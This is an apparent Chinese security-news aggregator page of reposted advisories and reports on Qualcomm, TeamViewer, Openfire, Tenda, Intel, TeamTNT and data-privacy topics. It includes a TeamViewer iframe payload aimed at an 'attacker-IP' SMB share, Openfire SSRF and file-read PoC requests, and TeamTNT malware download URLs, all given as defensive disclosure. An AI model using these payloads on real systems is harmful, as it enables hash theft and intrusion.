微慑信息网

业界快讯 第12页

高通Snapdragon漏洞影响近50%智能手机

微慑管理员阅读(2092)

漏洞概述

Check Point 安全研究人员Slava Makkaveev发现了高通Snapdragon芯片数字信号处理(DSP)的多个安全漏洞,攻击者利用这些漏洞可以在无需用户交互的情况下控制超过40%的智能手机、监听用户、并在绕过检测的情况下创建不可删除的恶意软件。

DSP是电信设备、TV和手机等用户电子设备中用于视频信号和数字图像处理的芯片上系统(system-on-chip)单元。Compute digital-signal processor (cDSP) 是允许移动设备处理以低功耗和高性能处理简单数据集的子系统。由于DSP芯片的特征和功能,其可以添加到任意设备上,但同时也引入了一些新的脆弱点,并增加了设备的攻击面。

相关漏洞一共收获6个CVE编号,分别是:

· CVE-2020-11201,

· CVE-2020-11202, 

· CVE-2020-11206, 

· CVE-2020-11207,

· CVE-2020-11208, 

· CVE-2020-11209。

研究人员称攻击者利用这些漏洞:

· 可以在无需用户交互的情况下将手机变成完美的监听工具。此外,攻击者还可以从手机中窃取照片、视频、录音、实时麦克风数据、GPS和位置数据等。

· 可以将手机变砖,无法响应。使得手机上的所有信息都无法使用,包括照片、联系人细节等,也就是定向的DoS攻击。

· 可以用恶意软件和其他恶意代码完全隐藏恶意活动,并且恶意代码无法删除。

高通Snapdragon漏洞影响近50%智能手机

数亿设备受到影响

有漏洞的DSP 芯片几乎用于每台安卓手机,包括来自谷歌、三星、LG、小米、一加等厂商的安卓手机。苹果的iPhone智能手机不受该漏洞的影响。

高通Snapdragon漏洞影响近50%智能手机

补丁即将发布

虽然高通已经修复了影响高通Snapdragon DSP芯片的漏洞,但手机厂商仍然没有向终端用户发布补丁,手机设备仍然处于威胁中。

因此,研究人员没有发布这些漏洞的详细技术细节,为手机厂商留出时间来开发和发布安全补丁。

研究人员在DEF CON 2020大会上做了题为Pwn2Own Qualcomm compute DSP for fun and profit的演讲,介绍了相关的研究成果。参见https://www.defcon.org/html/defcon-safemode/dc-safemode-speakers.html#Makkaveev

参考及来源:https://www.bleepingcomputer.com/news/security/nearly-50-percent-of-all-smartphones-affected-by-qualcomm-snapdragon-bugs/

高通Snapdragon漏洞影响近50%智能手机

高通Snapdragon漏洞影响近50%智能手机

原文始发于微信公众号(嘶吼专业版):高通Snapdragon漏洞影响近50%智能手机

TeamViewer 用户密码破解漏洞

微慑管理员阅读(3080)

【风险通告】TeamViewer 用户密码破解漏洞

近日,TeamViewer 官方发布了 TeamViewer 用户密码破解漏洞 的风险通告,漏洞概况如下:

CVE编号 CVE-2020-13699
风险等级 高危
利用条件 访问攻击者精心构造的恶意页面

漏洞详情

TeamViewer是一款可以随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问的远程连接控制软件。

TeamViewer多个版本中存在 用户密码破解漏洞攻击者通过让被攻击者点击精心构造的嵌入恶意iframe(iframe src=’teamviewer10: –play \attacker-IPsharefake.tvs’)的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。

复现过程

1.构造嵌入恶意iframe的页面。

 

【风险通告】TeamViewer 用户密码破解漏洞

 

2.访问恶意页面,即可启动TeamViewer

【风险通告】TeamViewer 用户密码破解漏洞

雁行安全团队建议TeamViewer用户及时对受影响版本的TeamViewer进行升级。

漏洞影响范围

TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3

 

修复建议

升级至最新版本 15.8.3,下载链接如下:

https://www.teamviewer.com/en/download/previous-versions/

 

 

参考链接

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

https://nvd.nist.gov/vuln/detail/CVE-2020-13699

应急支持

如需应急支持,请联系雁行安全团队

应急响应联系电话:400-029-4789 【转2】

 

 

原文始发于微信公众号(雁行安全团队):【风险通告】TeamViewer 用户密码破解漏洞

Openfire 未授权SSRF漏洞&任意文件读取

微慑管理员阅读(9088)

Openfire 未授权SSRF漏洞&任意文件读取

 

0x01 简介

Openfire(以前称为Wildfire和Jive Messenger)是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序,将其自身定位为中型企业控制内部通信并简化即时消息传递的平台。

 

0x02 SSRF CVE-2019-13894

此漏洞允许未经身份验证的攻击者向内部网络发送任意HTTP GET请求,并从目标Web服务获取完整的输出。

PoC:

GET /getFavicon?host=jd7uyj.dnslog.cn HTTP/1.1

Openfire 未授权SSRF漏洞&任意文件读取

Openfire 未授权SSRF漏洞&任意文件读取

推荐两个在线测试监控平台

http://ceye.io/http://www.dnslog.cn/

 

0x03 CVE-2019-13893 任意文件读取

该漏洞只影响windows下安装openfire的用户。

PoC:

GET /plugins/search/......confopenfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;

Openfire 未授权SSRF漏洞&任意文件读取

(此漏洞小编没有搭建环境,只复现了SSRF,图片来源于某大佬)

 

0x04 修复建议

如果您有Openfire服务器,请确保已将其更新到4.4.3或更高版本。

 

0x05 参考链接

 

https://www.seebug.org/vuldb/ssvid-98328https://swarm.ptsecurity.com/openfire-admin-console/https://www.cnblogs.com/potatsoSec/p/13437713.html

 

 

原文始发于微信公众号(渗透Xiao白帽):Openfire 未授权SSRF漏洞&任意文件读取

Tenda AC系列路由器远程命令执行0day漏洞:CVE-2020-10987 & CVE-2020-15916

微慑管理员阅读(3601)

 漏洞简介: 

腾达(Tenda) AC 系列是由腾达发布的针对家庭用户的无线路由器,市场占用率比较高,为综合类别较全的家庭无线路由器。

腾达(Tenda) AC 提供Web服务组件中的goform插件存在一个设计缺陷,权限验证不严格,可在未登陆验证的情况下发送特定的数据包成功利用此问题,触发任意命令执行,进而控制路由器设备,Web服务为root权限启动,获取到腾达路由器的最高权限

01

风险等级

威胁等级: 高危

影响面: 广

影响等级: 10颗星

02

漏洞详情

腾达(Tenda)路由器Web服务的goform组件在处理特定请求时,存在一个逻辑判断错误,权限验证不足导致可执行任意命令。

03

影响范围

包括但不限于以下型号腾达路由器,以及各个型号所有已发布的固件版本都受该漏洞影响,经过验证和分析,该安全问题影响腾达路由器的最新版本固件。

  •  AC 6

  •  AC 7

  •  AC 8

  •  AC 9

  •  AC 11

  •  AC 15

fofa上存活的设备ip数显示至少为10万台左右。

漏洞公告 | Tenda AC系列路由器远程命令执行0day漏洞:CVE-2020-10987 & CVE-2020-15916

04

修复措施

请用户实时关注腾达官网的固件更新,及时进行补丁修复。

漏洞演示

漏洞公告 | Tenda AC系列路由器远程命令执行0day漏洞:CVE-2020-10987 & CVE-2020-15916

维阵(AI图神经网络漏洞挖掘)一款基于图神经网络技术对设备和应用的二进制文件进行安全脆弱性检测的SaaS平台化服务产品,提供对二进制文件分析发现0day的在线服务。

“维阵”,历时十多个月,投入了过亿研发费用,动用了十多位数学教授、博士带领五十余名研发人员,AI算法模型经历了超过160次的版本迭代,最终打磨成型。

“维阵”,采用SaaS的服务模式,用户只需要将需要进行检测的二进制文件拖入,剩下的检测工作将完全交给系统来完成。这意味着,这款AI漏洞挖掘系统不仅仅适用于安全研究人员,对于并不擅长漏洞挖掘的开发人员而言,同样适用。这样做的好处显而易见——在产品上线之前,就能发现存在的安全问题,进一步提高产品的安全性,避免未来因安全漏洞造成更大的损失。

原文始发于微信公众号(极光无限):漏洞公告 | Tenda AC系列路由器远程命令执行0day漏洞:CVE-2020-10987 & CVE-2020-15916

美军背景公司被爆在500多款APP中植入跟踪软件,涉数亿用户

微慑管理员阅读(1704)

果然是满嘴道德仁义,一肚子见不得人的“猫腻”。

近日,美国频频借国家安全、信息泄露之名,行打压中国科技企业之实。谁想这贼喊捉贼的旧把戏,却因为一家背景非常特殊的美国小公司,彻底暴露了。

美军背景公司被爆在500多款APP中植入跟踪软件,涉数亿用户

当地时间8月7日,《华尔街日报》报道称,一家与美国国防和情报界有联系的美国小公司,已经将其软件植入到超过500款移动应用程序中,使其能够追踪全球数亿用户的位置数据。

 

报道称,私营公司买卖位置数据的情况虽不在少数,但与美国国安机构密切相关的企业直接收集此类数据,这是不寻常的。
这家位于弗吉尼亚州的美国小公司名叫Anomaly Six,由两名有情报背景的美国退伍军人创办。
名不见经传的小公司为何能掀起风浪,其到底是做什么生意的,不如一起来看看↓↓
该公司营销材料中介绍称,他们能够从500多个应用程序中提取位置数据,且其中一部分数据是通过其直接植入到应用里的软件开发工具包获取的。
如果消费者允许包含该软件的应用程序访问手机的GPS坐标,该公司就可以通过SDK获得手机的位置信息。
公司如何盈利呢?Anomaly Six这样的SDK制造商,出售消费者数据,以此牟取暴利。然后分一大笔给应用程序发行商。
美国用户和消费者隐私数据被卖,他们知道么?显然答案是否定的。美国大多数隐私条款都不会披露应用程序中是否嵌套了SDK工具包这样的信息。
据《华尔街日报》报道,Anomaly Six公司与哪些应用程序合作尚不清楚,该公司以保密协议为由拒绝置评。在商业数据销售领域,数据公司和应用程序开发商之间的合作关系通常是严格保密的商业秘密。
明目张胆买卖数据位置,天天把用户隐私、国家安全挂在嘴边的美国政府不管么? 

据《华尔街日报》报道,美国这方面的规定少之又少,就像是“拓荒前之美国西部”。
不仅不管,还涉事其中。
《华尔街日报》称,在许多美国政府部门看来,联邦机构从广告中获取移动数据是合法的,已有多个联邦执法机构正在将这类数据用于刑事执法,而许多美国军事和情报机构也在获取这类数据。

视频来源:中国日报抖音

 

Anomaly Six与美国政府的关系
如何被暴露的
Anomaly Six原本高度隐秘,为何能暴露呢?原因居然像极了狗血电视剧里的桥段。
Anomaly Six其实并不是第一家干数据买卖的公司,也不是最先跟美国军方合作的公司。该公司的两位创始人2018年从一家名为Babel Street的公司离职,开始抢“老东家”的生意。终于,被“老东家”告上了法庭。

《华尔街日报》在文章中兴奋地写道:“Babel Street两年前对Anomaly Six及其创始人提起的诉讼为我们提供了一个窗口,让我们得以一窥这个竞争激烈、高度隐秘的市场,即把用户数据作为产品提供给美国政府。”

据悉,Anomaly Six的创始人,美国前陆军反间谍官员布兰登·赫夫(Brandan Huff)曾负责处理Babel Street与国防部的关系,还为许多其他国防承包商工作过。法庭记录显示,另一位创始人名叫杰弗里·海因茨(Jeffrey Heinz)也曾在美国陆军服役,负责处理Babel Street与司法部、美国网络司令部、民间联邦机构和情报机构的关系。

Babel Street有一款名为“Locate X”的产品,主要功能包括从消费者应用程序中提取数百万用户的位置记录。
根据Babel Street的诉讼,Anomaly Six的这两位创始人辞职后,开始着手开发一款与该公司竞争的产品。Anomaly Six公司拒绝对这起诉讼发表评论。这起诉讼已于去年庭外和解。
要不是鱼死网破、诉诸公堂,外界几乎很难知道这些消息。
根据《华尔街日报》看到的合同和用户协议,Babel Street没有公开宣传“Locate X”,甚至约束客户和使用者对其进行保密。
根据法庭记录,按照美国政府官员意见开发的“Locate X”被美国军事情报部门广泛使用,他们致力于收集“开源”情报,即从公开来源获取的信息。美国联邦合同数据显示,Babel Street还与美国国土安全部、美国司法部和许多其他民间机构签订了合同。
Anomaly Six和Babel Street这两家公司都跟美国政府有千丝万缕的联系。
根据法庭记录和采访显示,Anomaly Six 创始人职业生涯的大部分时间都与美国国家安全机构密切合作。

《华尔街日报》记者在一份美国军方文件中,看到了官员对该公司强大数据收集能力的描述:
“Anomaly Six是一家退役军人拥有的小型企业,对来自移动设备的位置数据进行处理和可视化,用于分析和洞察,”“我们利用来自大量第一手资源的详细位置数据,为团队、行为和模式提供洞察。
美国政府拿着手机用户数据能做什么?
 
虽然Babel Street和Anomaly Six的一波内斗,只暴露出美国信息监控的冰山一角,但我们可以大概看到美国背后这些公司到底在干什么。

 

美军背景公司被爆在500多款APP中植入跟踪软件,涉数亿用户
据悉,Babel Street和Anomaly Six的产品综合各种情报收集方式,将以相对传统的方式收集到的情报与社交媒体数据、卫星图像和私营部门的消费者数据结合起来。
各类信息整合后,汇集成所谓的“生活模式”分析,这样就可以对潜在情报目标的习惯和行为有更充分的了解,进而为预测他们未来的行为提供可能性。
从应用程序中提取的数据中,每部手机通常都有一个字母数字标识符,该标识符与手机所有者的姓名没有关联。但是随着手机使用时间推移,可以让分析人员推断出它的所有权——例如,手机在晚上的位置和晚上可能是手机拥有者居住的地方。
《华尔街日报》上个月就报道过,作为美国陆军项目的一部分,学术研究人员使用Babel Street的软件能够监控到俄罗斯军事设施中设备的移动情况。
手机用户根本不知道,当他们安装天气应用程序、游戏或任何其他看似无害的应用程序时,他们的私人位置数据将被收集、出售和分析。 

这些年来,要说“网络窃密”,美国敢说第二,没人敢说第一。

“方程式”和“索伦之眼”等高威胁组织,后台是美国;曾在世界掀起轩然大波的“棱镜门”事件,始作俑者是美国;动辄对他国发动“网络战”的,还是美国……如今500多款应用中植入跟踪软件,美国军方依旧脱不了关系。

正如《中国日报》驻欧盟分社社长陈卫华在一条热评推文中写道的:美国APP监控着全世界。

美军背景公司被爆在500多款APP中植入跟踪软件,涉数亿用户

来源:中国日报(ID:chinadailywx)综合华尔街日报报道,编辑:王瑜

 

原文始发于微信公众号(环球时报):美军背景公司被爆在500多款APP中植入跟踪软件,涉数亿用户

20GB绝密芯片工程数据遭窃

微慑管理员阅读(2541)

2020年8月7日消息,据外媒报道,一名黑客周四公布了从英特尔窃取的20GB绝密芯片工程数据,这些数据可能会给多个平台的用户带来新的“零日漏洞”攻击威胁。

英特尔遭黑客攻击!20GB绝密芯片工程数据遭窃
黑客链接到加密信息平台Telegram上的一篇帖子详细说明了窃取的内容,并在底部附上了Mega文件。虽然这些内容本身是无害的,但它们包含可用于构建恶意软件的BIOS信息和英特尔专有技术的源代码。

这名黑客自称为“英特尔机密湖”,声称这些数据还没有在任何地方发布,而且大部分信息都受到严格的保密协议(NDA)保护。这些数据来自匿名消息来源,他在2020年早些时候入侵了英特尔。

如果黑客找到操纵代码并将其安装到目标计算机上的方法,Kabylake和其他处理器的BIOS代码可能会给这些用户带来麻烦。也许最具破坏性的是Tiger Lake平台的工具和固件,这可能会导致该产品上市前恶意软件泛滥。目前,还没有证据表明该数据库有在外部被利用的迹象。苹果此前已经宣布,打算在未来两年内将整个Mac系列上使用的英特尔处理器改为自主研发的Apple Silicon,因为英特尔无法跟上市场对更小工艺的需求,同时显然也存在安全担忧。

随后英特尔对此予以否认。英特尔官方回应:正在调查这一情况。这些信息似乎来自英特尔资源和设计中心,该中心为客户、合作伙伴和其它外部各方注册使用。公司认为,是某个有权限的个体下载并分享了这些内容。”

 

原文始发于微信公众号(安全学习那些事):英特尔遭黑客攻击!20GB绝密芯片工程数据遭窃

TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马

微慑管理员阅读(3712)

“由于上次遭受攻击的IP地址90%以上属于中国,因此建议防护方对此次攻击足够重视。”——微步情报局
编号: TB-2020-0014
报告置信度:85
TAG: 挖矿 Docker 德国 Linux 后门 TeamTNT
TLP: 白(报告转发及使用不受限制)
日期: 2020-07-14
 
摘要
 
近日,微步情报局监测发现一起尝试攻击Docker主机并植入挖矿木马的攻击活动,挖矿木马存放在一台位于德国的服务器(85.214.149.236)中,该服务器上还存在Tsunami DDoS木马和其他后门程序,其中一款木马样本与微步情报局今年1月发布的“我国大量服务器被黑产组织攻陷”通报中涉及的木马相同,疑似同一团伙所为,微步情报局其命名为“TeamTNT”。
事件概要
 
攻击目标
互联网服务器
攻击时间
2020年7月
攻击向量
Docker
攻击复杂度
最终目的
挖矿、僵尸网络
 
详情
 
2020年07月13日,微步情报局通过蜜罐捕获到一起针对Docker主机发动的攻击活动,攻击者尝试利用Docker容器API未授权访问导致的远程命令执行漏洞传播挖矿木马,攻击目标端口号为49153,恶意脚本地址为http://85.214.149.236:443/sugarcrm//…/cron.sh。

TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马

恶意脚本cron.sh,检查并清理其他挖矿进程然后下载并运行自身的挖矿程序

       TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马

 

恶意脚本run,下载伪装成banner.php的挖矿ELF程序,并保存为docker-update用于伪装,然后运行。

       TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马

 

经对挖矿ELF程序(MD5:ecf5c4e29490e33225182ef45e255d51)分析发现,该程序使用upx进行了压缩,具备挖矿能力,连接门罗币矿池地址18.210.126.40:10008
TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马
下载URL http://85.214.149.236:443/sugarcrm//…/上的其他应用程序
TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马
  • Bioset – 基于开源程序的Linux后门程序,监听1982端口
  • Clean – 清理其他挖矿软件和恶意程序
  • Cron.sh – 检查并清理其他挖矿进程然后下载并运行挖矿程序
  • Dns – Tsunami DDoS 木马程序,C&C为irc.kaiserfranz.cc irc.teamtnt.red
  • Docker – 挖矿程序
  • Key  私钥
  • Key.pub 公钥,并有用户名root@TeamTNT
  • Redis 挖矿程序
  • Run – 下载并运行挖矿程序
  • Tshd – so库,功能监听端口,执行控制端传送的命令
 其中bioset程序(MD5:4206dbcf1c2bc80ea95ad64043aa024a)与2020年01月16日微步在线发现的针对我国大量服务器进行攻击活动使用的木马相同。
此外,另有外国安全厂商于今年5月份曝光的一次挖矿相关的攻击活动中,攻击者使用的C&C irc.kaiserfranz.cc与此次攻击活动也是相同的。另一个恶意域名teamtnt.red是此次攻击中使用C&C irc.teamtnt.red的二级域名。
此次攻击的主要目的是挖矿,但也具备部署后门来维持权限的能力。由于上次遭受攻击的IP地址90%以上是属于中国,因此建议防护方对此次攻击足够重视。
 
行动建议
 
1、  在Docker的使用中,应限制访问权限,采用标准的最佳实践来减少攻击面。
2、  建议使用微步在线TDP、TIP、OneDNS等产品对该组织的攻击活动进行持续检测和防范。

附录

原文始发于微信公众号(安全威胁情报):TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马

ICT 技术成熟度曲线安全观察:零信任、数据安全、云原生安全的兴起

微慑管理员阅读(2220)

技术成熟度曲线简介

Gartner于近日发布了2020年的中国信息与通信技术(ICT)的成熟度曲线(Hype Cycle[1]) [2],今天,绿盟君将从安全方面的视角观察相关技术的发展。

众所周知,2020年是不平凡的一年,特别是新冠疫情的爆发,给全球经济、政治和人们生活带来了巨大的改变。而受新冠疫情冲击最早的正是中国,因而其影响也非常深远,特别是在抗疫期间,通过数字化转型支撑起了健康监控、远程办公、在线购物、物流配送、短视频等众多领域。对于企业而言,出于远程办公和削减开支的目的,在商业模式和基础设施层面的云化趋势速度加快。

本份Gartner的报告,也可以看出疫情加速了ICT成熟度曲线中几乎所有的技术,更具体地,Gartner将数字化转型分为:数字商务、现代基础设施平台以及新技术。不过从技术和领域角度看,也可以分为如下四个方面:

1、数字经济:

包括隐私、直播经济、工作流协作、电子商务平台

2、智能制造:

包括自主移动机器人应用、机器人处理自动化、工业物联网

3、现代基础设施平台:

网络和通信基础设施:零信任网络访问、5G、NB-IoT、可管理的SD-WAN服务

计算基础设施:中国的云安全、多云、容器即服务CaaS、边缘计算、超融合

存储基础设施:中国的区块链

研发平台:DevOps

4、基于大数据和人工智能的分析栈:

分析平台:数据中台、中台、AIOps平台

分析技术:自然语言技术、增强数据和分析

下图为Gartner的2020年ICT技术成熟度曲线图:

ICT 技术成熟度曲线安全观察:零信任、数据安全、云原生安全的兴起

图1 Gartner ICT 2020年技术成熟度曲线

与2019年的ICT技术成熟度曲线相比,2020年的技术成熟度曲线中云安全相关的技术有两个变化情况:第一,用容器即服务替换私有云,说明容器的流行度大大提高,可以说是爆发式的发展;第二,用多云替换公有云,说明其管理的复杂性。

相关技术介绍

本节将按照成熟度曲线的阶段,简要介绍相关的技术。

创新触发期的技术

自主移动机器人应用(Autonomous Mobile Robotic):带有传感器可自主移动并完成指定任务,可用于物流、零售供应链、医药等场景。

增强数据和分析(Augmented Data and Analytics):使用机器学习和人工智能进行数据管理和分析,用户可在统一平台上作分析。有点像安全领域的SIEM平台,但融入人工智能后会更复杂。

中国的云安全(Cloud Security in China):包括Gartner往年提的云安全技术CASB、CSPM、CWPP,涵盖了IaaS/PaaS/SaaS的数据面和管理面安全,另外新增了去年新提的SASE(安全访问边缘)技术。

隐私:敏感数据分级、本地保存等。主要是由移动支付、在线经济驱动等。需要充分考虑合规性要求,对不同区域的业务采取不同的隐私控制措施。

期望顶峰期的技术

直播经济(Live Commerce):使用视频流媒体实时地促进消费,如抖音、快手是以此起家,其他电商如京东、淘宝也在上线,但国外很少用直播来带货,可以说直播经济具有中国特色。

多云(Multicloud):企业租用多个公有云支撑某个业务,以避免厂商锁定的问题,同时提升业务可用性。

零信任网络访问(ZTNA):基于身份、上下文的逻辑访问应用边界,需要先借助可信代理得到认证授权,然后才能访问服务,可避免重要服务暴露在公开网络。ZTNA还在早期,不过发展很快。

容器即服务(CaaS):提供容器运行时、容器编排、任务调度和资源管理等功能。

数据中台(Data Middle Office):是一种机构策略,可提供单一、一致的视图,有效地让前台用户利用后台数据进行决策。如果一个机构自己都不知道从自己的数据中重用分析能力,也就无法用好中台。虽然很多机构想用中台减少分析架构中的冗余度,打通数据孤岛,但中台自身也增加了复杂度。

中台(Middle Platform):包括技术中台(technology middle platform)、数据中台(data middle platform),以及业务中台(business middle platform)。

工作流协作(Workstream Collaboration):使用集成的通信和协作、业务流程和知识管理技术和工具,提供自服务、开箱即用的用户体验,提供内部和外部的协助能力。如钉钉、腾讯会议。疫情促使工作流协同快速流行,将来会成为新常态。

边缘计算:将计算能力移动,尽可能靠近业务端,是将计算能力与通信网络深度融合的新技术。

开发运营一体化(DevOps):客户价值驱动、使用敏捷的方法交付的的途径。在中国,对于技术的关注度更高,因而DevOps与CI/CD是等价的。传统安全是基于许可门(approval gate),而DevOps则依靠快速交付,即最小产品变化、自动化快速恢复、不变的基础设施和可视化工具。DevOps的兴起与云服务应用是同步的。

5G:新一代的通信技术,在此不做赘述。Gartner预计eMBB最快,mMTC会最慢,这也是符合当前发展现状的。

自然语言技术(Natural Language Technologies):前身是自然语言处理NLP,NLT做了扩展,如自然语言理解、生成、文本分析、对话系统、知识图谱、机器翻译等。一个新方向是使用OCR和NLP支持robotic process automation (RPA)。

机器人处理自动化(RPA Software):数字化的赋能工具,可模拟人工操作,或执行机机自动化。例如疫情期间通过大数据定位高风险人群就是一例。挑战在于终端客户缺乏定制软件的能力,传统公司缺乏从事商业操作和流程的IT工程师。

幻想破灭期的技术

AIOps平台:结合大数据、人工智能和机器学习支撑所有主要的IT运营功能,具有主动、个性化和动态的深度可视度。考虑:敏捷和产出物,增效降费,缓解风险。

可管理的SD-WAN服务:包括SD-WAN产品,WAN传输和管理服务,三大运营商统治这个细分领域,不过当前还在MPLS技术,但有些省的运营商开始做可管理的SD-WAN服务。

社区云:包括政务云、行业云,介于私有云和公有云之间。由于是政府和重要行业所建的云,所以非常重视本行业的监管要求,客户将合规性要求高的业务放在社区云,将合规性要求低的放在公有云。

窄带物联网(NB-IoT ):3GPP定义的广域低功耗LPWA技术标准,在5G R16确定为5G标准。中国政府强力支持NB-IoT,三大运营商宣称部署上万个NB-IoT基站,目前已升级一百万个基站支持NB-IoT,2025年升级三百万个基站。业务方面,2019年已有1亿个连接的终端,数量占全球90%。

超融合:交付融合了计算、存储和网络的硬件设备,特点是敏捷、管理简单、可扩展。客户主要以中型企业为主。

工业物联网:物联网的分支,改善资产管理、运营可见度,在设备密集环境下控制设备。覆盖工厂、运输、物流等。现代化运营体系,减少运营成本,在缺少人力和供应链不确定的疫情期间保持自适应和弹性。使用云计算、数据科学监控生产线上的数据,管理复杂流程。其障碍是缺乏标准化、安全和隐私保护。

电子商务平台(Digital Commerce Platform):在线购物,疫情加速让食物配送等业务通过在线完成。

中国的区块链(Blockchain in China):与其他国家相比,中国的区块链有国家政策推动,发展迅速,因而已经接近稳步爬升期。由于强监管,基于区块链的加密货币的投机泡沫被捅破,当前主要是开发区块链的商业价值。

观察和分析

观察1:中国特色明显

第一个观察是“中台”,由阿里巴巴首次提出并在国内流行的技术,Gartner在报告中也反复提到这一点,可见在国内的互联网环境中,也创生了很多有中国特色的技术。不过,Gartner对中台和数据中台的分析也是两拨分析师,其中中台(Middle Platform)与数据中台(Data Middle Office)中的中台对应英文单词不一样,不知为何。另外,这两者关系不明,中台描述中中台就包括了数据中台(data middle platform),那这个“数据中台”跟前面的数据中台是一回事吗?也许是分析师没有说清楚,但目前中台的概念尚未清晰,事实上也时常看到圈子中对中台概念和价值的讨论。

第二个观察是,Gartner把云计算和区块链后面分别加上了In China,所以绿盟君翻译为“中国的云计算”和“中国的区块链”。客观上看,中外的云计算发展路线不同,因而云计算安全的作用域和作用方法都不同;而区块链方面,纯币圈产业遭到了强势监管,而区块链作为存储基础设施的应用得到重视,去年区块链更是上升到了国家战略,后续的发展路线显然跟国外也不一样。

技术的发展是满足业务的需求,而业务的发展则是顺应国情。所以,技术本没有国界,但国内技术的发展路线却有明显中国特色的。

观察2:融合是技术发展的主题

从技术和分类可以看到,随着ICT技术的发展,各类技术除了纵深发展(如大数据人工智能的中台能力建设)外,还会与相关的技术、领域和行业融合,形成新的技术点。大体上可分为三类:

1、小融合,相关技术的融合。例如,超融合将计算、存储和网络资源进行融合,形成了统一的资源管理技术。

2、中融合,相关领域的技术融合。例如云网融合,云计算技术与通信、网络技术融合,形成了边缘计算等新技术。

3、大融合,相关技术与行业结合。例如工业物联网,将物联网技术、IT技术和人工智能等技术相结合;又如5G,将云计算技术、边缘计算与下一代通信网络等结合,形成了更大范围的技术栈。

安全技术分析

作为一名安全从业者,看到今年的ICT技术发展,也谈谈几点看法。

零信任兴起

随着零信任的理念西风东渐,越来越多的国家机构和大型企业在考虑通过零信任重新构建新的业务访问模型和体系。从趋势上可以看到零信任将会越来越多地被提到,而且也会有越来越多地零信任应用和架构落地。

不过还是需要提一下,零信任肯定也会表现出鲜明的国家特色。国外的零信任,特别是ZTNA的背景,主要是中小企业将业务上云,其中不乏重要业务,那么在混合云、多云、SD-WAN环境下,如何保证一致的访问控制,如何像以前将重要资产隐藏在互联网中,从而出现了如SDP、BeyondCorps等技术[3]。而国内上云,特别是公有云的趋势还没有那么快,中小企业的监管还没有那么强,当前零信任的主要推动者主要是大型机构,因而这种零信任,从架构和技术实现上,预计会表现很强的“中国特色”。

最后,从效果上来看,ZTNA等零信任机制基本上完全改变了以往的网络访问模式,对业务和安全的影响肯定是颠覆性的(这也是零信任很难落地最重要的障碍),但Gartner把其重要度标为是中等,也许网络访问在整个ICT体系中还是太小了(ZTNA-访问控制-安全-ICT,中间隔了两层)?

数据安全将成为新热点

随着数据安全法等相关的法律法规落地,数据安全也会成为一个重要的细分安全领域。Gartner将隐私单独列为一个技术点,也值得重视。

国外已经存在GDPR和CCPA等数据安全法规,其中最重要的保护内容就是个人数据和隐私。在国内,虽然当前的隐私保护还没有很多可执行的法规,但随着《数据安全法(草案)》征求意见的推进,相信很快相关法律就会就位。届时,以敏感数据和个人隐私为防护主体的合规性要求将会覆盖所有的相关行业。相关企业应该考虑如何对数据进行分类分级,确定敏感数据和个人隐私,进而对其进行重点防护,如匿名化及其评估,以及安全数据共享和计算等[4]。

云安全走向云原生

中国的云安全与国外的云安全是不一样的,所以Gartner特意使用了“中国的云安全”,而非简单的云安全。Gartner特意指出,大多数中国的安全厂商都聚焦在CWPP以保护客户在公有云上的安全。绿盟君认为,其他云安全技术,如CASB因为国内缺乏重量级的企业级SaaS而导致市场较小;CSPM则因为国内的公有云相比私有云、行业云还是较少,所以也没有得到重视;SASE是随着零信任而兴起的安全访问技术,不过只有当企业将重要业务上到公有云之后,这项技术才能发挥其真正价值。

从技术发展上看,今年容器即服务(CaaS)代替了去年的私有云,与之相关的服务编排、微服务等云原生技术将会成为未来发展的方向。国内CWPP现在主要集中在虚拟化的IaaS层面,但预计今后几年会往容器安全方向发展,包括容器镜像安全评估、容器环境安全基线检查、运行时环境隔离和入侵检测防护、微服务和服务网格应用安全等等。

最后,附一张技术价值和成熟期的图,供读者参考。

ICT 技术成熟度曲线安全观察:零信任、数据安全、云原生安全的兴起

·   参考文献    ·

 

[1] 技术成熟度曲线https://zh.wikipedia.org/wiki/%E6%8A%80%E6%9C%AF%E6%88%90%E7%86%9F%E5%BA%A6%E6%9B%B2%E7%BA%BF

[2] https://www.gartner.com/document/3976114?ref=TypeAheadSearch

[3] https://mp.weixin.qq.com/s?src=11×tamp=1596093199&ver=2491&signature=o8CFonAI5vBMcCu2cxvXKY7p7sQbCcWjyuuO1mZX5d43LwZEoEXE*9xrUuo25K4mZTrPsGsozL7Z7YImU9XnpDyeanIXK4I6N4Lq*-FlAPonCmRiju5HNJzzSNcz6*2p&new=1

[4] https://mp.weixin.qq.com/s?src=11×tamp=1596095276&ver=2491&signature=o8CFonAI5vBMcCu2cxvXKY7p7sQbCcWjyuuO1mZX5d4sUd-BgYpOqtH1W0t7l0eKlA*2j98zs5SbjEPS3MamdlSww4iuSbhUu1HzRYL6T4Kc5S4m8GyqIGK55kEm9-26&new=1

 

原文始发于微信公众号(绿盟科技):ICT 技术成熟度曲线安全观察:零信任、数据安全、云原生安全的兴起

装修公司花240万买业主信息:牵扯出四川5市房管系统遭黑客入侵

微慑管理员阅读(1667)

据警方调查,四川某装修公司为谋求快速发展,花费240余万元购买涉及川、渝、黔3省份近千楼盘70余万条公民个人信息。此案中,还有4人入侵四川5市房管系统,非法获取楼盘业主信息。

装修公司花240万买业主信息:牵扯出四川5市房管系统遭黑客入侵

警方挡获涉案人员

2019年,四川德昌县公安局破获一起公安部督办的“侵犯公民个人信息、黑客案”。据警方调查,四川某装修公司为谋求快速发展,花费240余万元购买涉及川、渝、黔3省份近千楼盘70余万条公民个人信息。此案中,还有4人入侵四川5市房管系统,非法获取楼盘业主信息。

